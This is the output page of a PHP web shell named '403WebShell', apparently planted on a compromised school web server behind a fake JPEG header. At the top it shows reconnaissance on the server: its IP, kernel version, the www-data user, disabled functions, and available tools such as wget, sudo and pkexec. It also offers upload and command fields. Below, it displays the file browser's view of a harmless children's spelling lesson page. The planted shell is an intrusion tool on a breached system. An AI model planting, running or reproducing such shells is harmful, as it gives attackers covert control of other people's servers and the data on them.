????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.139.237.30
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelF/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelF/Category1/LevelFCat1Lesson11.html
<!doctype html>
<html>
    <head>
        <title>Word sums and underline the correct spelling</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            
            function page_preLoad()
            {                
                shared_setDeviceTypeLevelCategoryLastLesson(Level.F, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.F, Category.No1, 11), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_options = ['id_options1', 'id_td_mouseTrap', 'id_td_household', 'id_td_township', 'id_td_downfall', 'id_td_mouthful'];
                var ids_spans = ['id_span_mouseTrap', 'id_span_household', 'id_span_township', 'id_span_downfall', 'id_span_mouthful'];
                var ids_boxes = ['id_dropbox_downfall', 'id_dropbox_township', 'id_dropbox_household', 'id_dropbox_mousetrap', 'id_dropbox_mouthful'];
                
                var ids_texts = ['id_text1', 'id_text2', 'id_text3', 'id_text4', 'id_text5', 'id_text6', 'id_text7', 'id_text8', 'id_text9', 'id_text10', 'id_text11', 'id_text13', 'id_text15', 'id_text17', 'id_text19', 'id_text21', 'id_text23', 'id_text25', 'id_text27', 'id_text29', 'id_text31', 'id_text33', 'id_text35', 'id_td1', 'id_td2', 'id_td3', 'id_td4', 'id_td5', 'id_td6', 'id_td7', 'id_td8', 'id_td9', 'id_td10', 'id_td11', 'id_td12'];
                
                var ids_All = ids_headings.concat(ids_options, ids_texts, ids_boxes);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                shared_init_dropping_spans(ids_spans);
                
                var id_tables_array = ['id_table1', 'id_table2'];
                shared_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {
                getAllGroupsCanvasIdsArray();
                
                drawUnderline();
            }
        
            function getAllGroupsCanvasIdsArray()
            {
                var set1IdsArray = ['id_td1', 'id_td2'];
                var set2IdsArray = ['id_td3', 'id_td4'];
                var set3IdsArray = ['id_td5', 'id_td6'];
                var set4IdsArray = ['id_td7', 'id_td8'];
                var set5IdsArray = ['id_td9', 'id_td10'];
                var set6IdsArray = ['id_td11', 'id_td12'];
                
                shared_allGroupsIdsArrayInArray = [set1IdsArray, set2IdsArray, set3IdsArray, set4IdsArray, set5IdsArray, set6IdsArray];
            }
        
            function drawUnderline()
            {
                for (var id = 1; id <= 12; id++)
                {
                    shared_draw_underline('id_td' + id);
                }
            }        
        
            function td_click(id_td)
            {
                shared_showHideUnderlineOfCorrespondingGroup(id_td, shared_allGroupsIdsArrayInArray);
            }        
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelF');
            }
        
            function btnPrevious_click()
            {
                window.location = 'LevelFCat1Lesson10.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelFCat1Lesson12.html';
            }
        
            function DragDrop(id_dropBox, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_dropbox_downfall', 'id_dropbox_township', 'id_dropbox_household', 'id_dropbox_mousetrap', 'id_dropbox_mouthful'];
                var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
                
                var correctTdIdsArray = ['id_td2', 'id_td3', 'id_td5', 'id_td8', 'id_td9', 'id_td12'];
                
                var nCorrectTds = shared_validate_tds(shared_allGroupsIdsArrayInArray, correctTdIdsArray);
                
                if (isAllBoxesFilled && nCorrectTds == 6)
                {
                    shared_show_claps_animation('shared_id_div_claps_image');
                }
            }
        </script>

    </head>
    <body onload="page_onLoad()">
        
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                                    <tr height="50%">
                                        <td style="padding-bottom:0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="10%">
                                                    <td id="id_td_heading1" class="shared_style_blue_24px_bold_padding_left_2_percent">Word sums:
                                                    </td>
                                                </tr>
                                                <tr height="20%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr>
                                                                <td id="id_options1" class="shared_style_blue_24px_bold_padding_left_2_percent" width="15%">Options:</td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr height="50%">
                                                                            <td id="id_td_mouseTrap" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_mouseTrap">mousetrap</span>
                                                                            </td>
                                                                            <td id="id_td_household" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_household">household</span>
                                                                            </td>
                                                                            <td id="id_td_township" class="shared_style_red_24px_bold" width="*" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_township">township</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="50%">
                                                                            <td id="id_td_downfall" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_downfall">downfall</span>
                                                                            </td>
                                                                            <td id="id_td_mouthful" class="shared_style_red_24px_bold" width="33%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_mouthful">mouthful</span>
                                                                            </td>
                                                                            <td id="id_text1" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td style="padding-left:5%">
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                            <tr id="id_tr_dropbox_downfall" height="20%"
                                                                ondragover="shared_highlight('id_dropbox_downfall'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_downfall')"
                                                                ondrop="DragDrop('id_dropbox_downfall', ['id_span_downfall'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_text2" class="shared_style_black_24px_bold_padding_left_2_percent"  width="27%">down <span style="color:blue">+</span> fall <span style="color:blue">=</span></td>
                                                                            <td id="id_dropbox_downfall" class="shared_style_red_24px_bold" width="25%" align="center">____________</td>
                                                                            <td id="id_text3" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_township" height="20%"
                                                                ondragover="shared_highlight('id_dropbox_township'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_township')"
                                                                ondrop="DragDrop('id_dropbox_township', ['id_span_township'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_text4" class="shared_style_black_24px_bold_padding_left_2_percent"  width="27%">town <span style="color:blue">+</span> ship <span style="color:blue">=</span></td>
                                                                            <td id="id_dropbox_township" class="shared_style_red_24px_bold" width="25%" align="center">____________</td>
                                                                            <td id="id_text5" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_household" height="20%"
                                                                ondragover="shared_highlight('id_dropbox_household'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_household')"
                                                                ondrop="DragDrop('id_dropbox_household', ['id_span_household'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_text6" class="shared_style_black_24px_bold_padding_left_2_percent"  width="27%">house <span style="color:blue">+</span> hold <span style="color:blue">=</span></td>
                                                                            <td id="id_dropbox_household" class="shared_style_red_24px_bold" width="25%" align="center">____________</td>
                                                                            <td id="id_text7" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_mousetrap" height="20%"
                                                                ondragover="shared_highlight('id_dropbox_mousetrap'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_mousetrap')"
                                                                ondrop="DragDrop('id_dropbox_mousetrap', ['id_span_mouseTrap'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_text8" class="shared_style_black_24px_bold_padding_left_2_percent"  width="27%">mouse <span style="color:blue">+</span> trap <span style="color:blue">=</span></td>
                                                                            <td id="id_dropbox_mousetrap" class="shared_style_red_24px_bold" width="25%" align="center">____________</td>
                                                                            <td id="id_text9" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_dropbox_mouthful" height="20%"
                                                                ondragover="shared_highlight('id_dropbox_mouthful'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropbox_mouthful')"
                                                                ondrop="DragDrop('id_dropbox_mouthful', ['id_span_mouthful'])">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_text10" class="shared_style_black_24px_bold_padding_left_2_percent"  width="27%">mouth <span style="color:blue">+</span> ful <span style="color:blue">=</span></td>
                                                                            <td id="id_dropbox_mouthful" class="shared_style_red_24px_bold" width="25%" align="center">____________</td>
                                                                            <td id="id_text11" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table id="id_table2" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                                <tr height="10%">
                                                    <td id="id_td_heading2" class="shared_style_blue_24px_bold_padding_left_2_percent">Underline the correct spelling [<span style="color:blue">click to underline</span>]:
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td style="padding-left:5%">
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                            <tr height="16.6%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td1" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td1')">flouwer</td>
                                                                            <td id="id_text13" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td2" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td2')">flower</td>
                                                                            <td id="id_text15" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="16.6%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td3" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td3')">shower</td>
                                                                            <td id="id_text17" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td4" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td4')">shawer</td>
                                                                            <td id="id_text19" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="16.6%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td5" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td5')">pillow</td>
                                                                            <td id="id_text21" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td6" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td6')">pillou</td>
                                                                            <td id="id_text23" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="16.6%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td7" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td7')">windaw</td>
                                                                            <td id="id_text25" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td8" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td8')">window</td>
                                                                            <td id="id_text27" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="16.6%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td9" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td9')">vowel</td>
                                                                            <td id="id_text29" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td10" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td10')">vovel</td>
                                                                            <td id="id_text31" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="2%">
                                                                        <tr>
                                                                            <td id="id_td11" class="shared_style_black_24px_bold_padding_left_2_percent"  width="15%" onClick="td_click('id_td11')">snou</td>
                                                                            <td id="id_text33" class="shared_style_black_24px_bold"  width="5%" align="center"><span style="color:blue">/</span></td>
                                                                            <td id="id_td12" class="shared_style_black_24px_bold" width="15%" align="center" onClick="td_click('id_td12')">snow</td>
                                                                            <td id="id_text35" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_mouseTrap', {handle : 'id_td_mouseTrap', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_household', {handle : 'id_td_household', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_township', {handle : 'id_td_township', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_downfall', {handle : 'id_td_downfall', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_mouthful', {handle : 'id_td_mouthful', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_dropbox_mousetrap', {onOver : function(){shared_highlight('id_dropbox_mousetrap')}, onOut : function(){shared_un_highlight('id_dropbox_mousetrap')}, onDrop : function(){DragDrop('id_dropbox_mousetrap', ['id_span_mouseTrap'])}});
            
            webkit_drop.add('id_tr_dropbox_household', {onOver : function(){shared_highlight('id_dropbox_household')}, onOut : function(){shared_un_highlight('id_dropbox_household')}, onDrop : function(){DragDrop('id_dropbox_household', ['id_span_household'])}});
            
            webkit_drop.add('id_tr_dropbox_township', {onOver : function(){shared_highlight('id_dropbox_township')}, onOut : function(){shared_un_highlight('id_dropbox_township')}, onDrop : function(){DragDrop('id_dropbox_township', ['id_span_township'])}});
            
            webkit_drop.add('id_tr_dropbox_downfall', {onOver : function(){shared_highlight('id_dropbox_downfall')}, onOut : function(){shared_un_highlight('id_dropbox_downfall')}, onDrop : function(){DragDrop('id_dropbox_downfall', ['id_span_downfall'])}});
            
            webkit_drop.add('id_tr_dropbox_mouthful', {onOver : function(){shared_highlight('id_dropbox_mouthful')}, onOut : function(){shared_un_highlight('id_dropbox_mouthful')}, onDrop : function(){DragDrop('id_dropbox_mouthful', ['id_span_mouthful'])}});
            
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit